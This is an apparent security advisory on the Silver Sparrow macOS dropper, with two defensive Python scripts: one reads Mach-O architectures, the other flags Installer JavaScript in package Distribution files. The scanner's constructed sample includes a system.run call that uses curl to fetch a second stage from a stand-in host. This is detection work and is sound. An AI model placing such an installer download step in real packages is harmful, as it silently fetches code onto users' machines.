Silver Sparrow: MacOS target

Updated: May 6, 2021

Datto reports to its partners that "a new malware threat dropper known as Silver Sparrow emerged earlier this month, targeting MacOS. In response, a Silver Sparrow Detection and Prevention script is now available". A dropper is the component an attacker uses to establish persistence on a device and deliver the payload, the component that actually causes harm to the system. From this analysis there are four interesting details about the attack that should raise the profile of this activity, and your guard in protecting your small and medium business (SMB) clients. Dan Garcia reported and outlined these "details about the attacks below.


Targeting the Apple M1 Architecture

Launched in November, the Apple M1 architecture marked the departure from the Intel-based processors that Apple has relied on for desktop and laptop product lines. Up to this point in time, there hasn’t been a variant that has targeted the new ARM64 based architecture from Apple. The teams at Red Canary and Malwarebytes who made the discovery uncovered two variants of Silver Sparrow. While the first variant was Intel x86_64 only, the second sample included both x86_64 and ARM64 architectures in the PKG. This should be a clear signal to the MSP community that actors are continuing to target macOS and evolving their techniques.
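When triaging a package like this, the quickest way to confirm which architectures a dropped binary targets is to read its Mach-O header: a universal ("fat") binary carries a big-endian table of per-architecture slices, while a thin binary states a single CPU type. The parser below is an added example, not code from Datto, Red Canary or Malwarebytes; the sample headers it builds are constructed (header only, no real slices) and are not taken from Silver Sparrow. On macOS, `lipo -archs` or `file` give the same answer once the package's Payload has been unpacked.

```python
import struct

FAT_MAGIC = 0xCAFEBABE      # universal ("fat") binary, big-endian header
FAT_MAGIC_64 = 0xCAFEBABF   # 64-bit fat header variant (fat_arch_64 entries)
MH_MAGIC = 0xFEEDFACE       # thin 32-bit Mach-O, written in the producer's byte order
MH_MAGIC_64 = 0xFEEDFACF    # thin 64-bit Mach-O, written in the producer's byte order

# cpu_type_t values from <mach/machine.h>; the 0x01000000 bit is CPU_ARCH_ABI64.
CPU_TYPES = {
    0x00000007: "i386",
    0x01000007: "x86_64",
    0x0000000C: "arm",
    0x0100000C: "arm64",
    0x00000012: "ppc",
}


def _name(cputype: int) -> str:
    return CPU_TYPES.get(cputype, f"cputype_{cputype:#x}")


def macho_architectures(data: bytes) -> list:
    """Return the CPU architectures contained in a Mach-O blob, in header order.

    Fat headers are always big-endian. Thin headers are read as little-endian,
    which is what every x86_64 and arm64 toolchain produces; big-endian thin
    (MH_CIGAM) binaries only ever came from PowerPC and are not handled here.
    """
    if len(data) < 8:
        return []
    magic_be, = struct.unpack(">I", data[:4])
    if magic_be in (FAT_MAGIC, FAT_MAGIC_64):
        nfat, = struct.unpack(">I", data[4:8])
        # Caveat: Java class files share the CAFEBABE magic; there the second
        # field is the class-file minor version, so a huge "nfat" is not Mach-O.
        if nfat > 64:
            return []
        entry_size = 20 if magic_be == FAT_MAGIC else 32   # sizeof(fat_arch) vs sizeof(fat_arch_64)
        archs = []
        for i in range(nfat):
            off = 8 + i * entry_size
            if off + 4 > len(data):
                break                                        # truncated header, report what we have
            cputype, = struct.unpack(">I", data[off:off + 4])
            archs.append(_name(cputype))
        return archs
    magic_le, = struct.unpack("<I", data[:4])
    if magic_le in (MH_MAGIC, MH_MAGIC_64):
        cputype, = struct.unpack("<I", data[4:8])           # mach_header.cputype follows the magic
        return [_name(cputype)]
    return []


def targets_apple_silicon(data: bytes) -> bool:
    """True when the blob contains a native arm64 slice (runs on M1 without Rosetta)."""
    return "arm64" in macho_architectures(data)


# --- constructed sample headers (assumption: header only, slices omitted) ---

def build_fat_header(cputypes) -> bytes:
    hdr = struct.pack(">II", FAT_MAGIC, len(cputypes))
    for i, ct in enumerate(cputypes):
        # fat_arch: cputype, cpusubtype, offset, size, align (2^14 page alignment)
        hdr += struct.pack(">IIIII", ct, 3, 0x4000 * (i + 1), 0x1000, 14)
    return hdr


def build_thin_header(cputype: int) -> bytes:
    # mach_header_64: magic, cputype, cpusubtype, filetype (MH_EXECUTE=2), ncmds, sizeofcmds, flags, reserved
    return struct.pack("<IIIIIIII", MH_MAGIC_64, cputype, 0, 2, 0, 0, 0, 0)


if __name__ == "__main__":
    universal = build_fat_header([0x01000007, 0x0100000C])
    print("universal:", macho_architectures(universal), "apple silicon:", targets_apple_silicon(universal))
    intel_only = build_fat_header([0x01000007])
    print("intel-only:", macho_architectures(intel_only), "apple silicon:", targets_apple_silicon(intel_only))
    print("thin arm64:", macho_architectures(build_thin_header(0x0100000C)))
```

A first-variant style package would show only `x86_64`; the second variant described above would show both `x86_64` and `arm64`, which is what `targets_apple_silicon` keys on.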


Use of the macOS Installer Javascript API

Existing malware techniques leverage preinstall and postinstall scripts as part of the installer, from which detection engines can identify process execution patterns and take action. Silver Sparrow leverages the trusted macOS Installer process to execute malicious JavaScript commands buried in an XML file included in the package. This provides the malicious code additional cover from existing detection capabilities, and from those that make assumptions about trusted operating system processes, thus making this challenging for many next-gen engines to identify as malicious. This is a clear move to look more like a normal or trusted package install and remove a detection opportunity for defenders.
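One way to put that detection opportunity back, as an added example (not Datto's script, and not code from the Red Canary or Malwarebytes analyses): expand the package with `pkgutil --expand sample.pkg out/` and inspect the resulting `Distribution` file, which is the XML the paragraph refers to. The script below parses a Distribution XML, collects every `<script>` body and every attribute that Installer.app evaluates as JavaScript, and flags calls to `system.run`, the Installer JavaScript API for launching an external program. Treating `system.run` as the indicator, the list of JavaScript-bearing attributes, and the sample Distribution are assumptions of this example; the sample is constructed and not taken from Silver Sparrow.

```python
import re
import xml.etree.ElementTree as ET

# Distribution attributes whose values Installer.app evaluates as JavaScript
# expressions (assumption of this example; the common ones from Apple's format).
JS_ATTRS = {"script", "selected", "visible", "enabled",
            "start_selected", "start_visible", "start_enabled"}

# system.run(...) hands control to an external program; anything beyond a
# version or disk-space check has little reason to do this from a Distribution.
RUN_CALL = re.compile(r"\bsystem\.run\w*\s*\(([^)]*)\)")


def find_installer_js(distribution_xml) -> list:
    """Return every JavaScript snippet in a Distribution file, with its location
    and the arguments of any system.run-style call it contains."""
    root = ET.fromstring(distribution_xml)
    findings = []
    for elem in root.iter():
        if elem.tag == "script" and elem.text and elem.text.strip():
            findings.append({"where": "<script>", "code": elem.text.strip()})
        for attr, value in elem.attrib.items():
            if attr in JS_ATTRS:
                findings.append({"where": f"<{elem.tag} {attr}=...>", "code": value})
    for finding in findings:
        finding["run_calls"] = [m.group(1).strip() for m in RUN_CALL.finditer(finding["code"])]
    return findings


def flag_suspicious(distribution_xml) -> list:
    """Only the snippets that launch an external program."""
    return [f for f in find_installer_js(distribution_xml) if f["run_calls"]]


# Constructed sample Distribution (not from any real package): one benign
# version gate plus one function that fetches a second stage via curl.
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="1">
  <title>Constructed Sample</title>
  <options customize="never" allow-external-scripts="no"/>
  <script>
  function installationCheck() {
      // benign: a version gate, the normal use of Installer JS
      return system.compareVersions(system.version.ProductVersion, '10.13') >= 0;
  }
  function fetchStage() {
      // constructed: the installer process itself launching an external program
      system.run('/usr/bin/curl', '-s', '-o', '/tmp/stage', 'https://example.invalid/stage');
      return true;
  }
  </script>
  <installation-check script="installationCheck()"/>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default" selected="fetchStage()"/>
  <pkg-ref id="com.example.constructed"/>
</installer-gui-script>
"""


if __name__ == "__main__":
    for f in find_installer_js(SAMPLE_DISTRIBUTION):
        status = "RUNS EXTERNAL PROGRAM" if f["run_calls"] else "ok"
        print(f"{f['where']:<35} {status}")
        for args in f["run_calls"]:
            print("    system.run(", args, ")")
```

Note that the `<choice selected="fetchStage()"/>` attribute is not flagged on its own: it only calls into the `<script>` block, which is where the `system.run` lives and where the finding is reported. A reviewer should therefore read every flagged `<script>` body rather than only the attribute hooks.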


The Missing Payload

Through the analysis conducted, neither team had observed the most impactful part of any dropper: the payload. Payloads are what we generally hear about in the news and in our response efforts (these include RYUK and Trickbot), and they have consequential results. The Malwarebytes team indicates that all of the hosts on which the dropper was identified seem to lack the payload. Furthermore, within the execution scripts there were coded messages using the standard "Hello World", which lends itself to the idea that Silver Sparrow is still under development by an actor. The evidence strongly suggests that this dropper is in its early days and that we will likely hear more about Silver Sparrow in the future.


Self Destruction

We can all appreciate someone cleaning up after themselves, but the guest you want stopping by and cleaning up any traces isn’t Silver Sparrow. While the dropper is meant to be persistent, there is a kill switch of sorts built into Silver Sparrow to force the removal of the components with persistent mechanisms installed. This is accomplished through monitoring for the presence of a file. This technique allows its operators, if desired, to drop the payload and exit from the system without a trace."

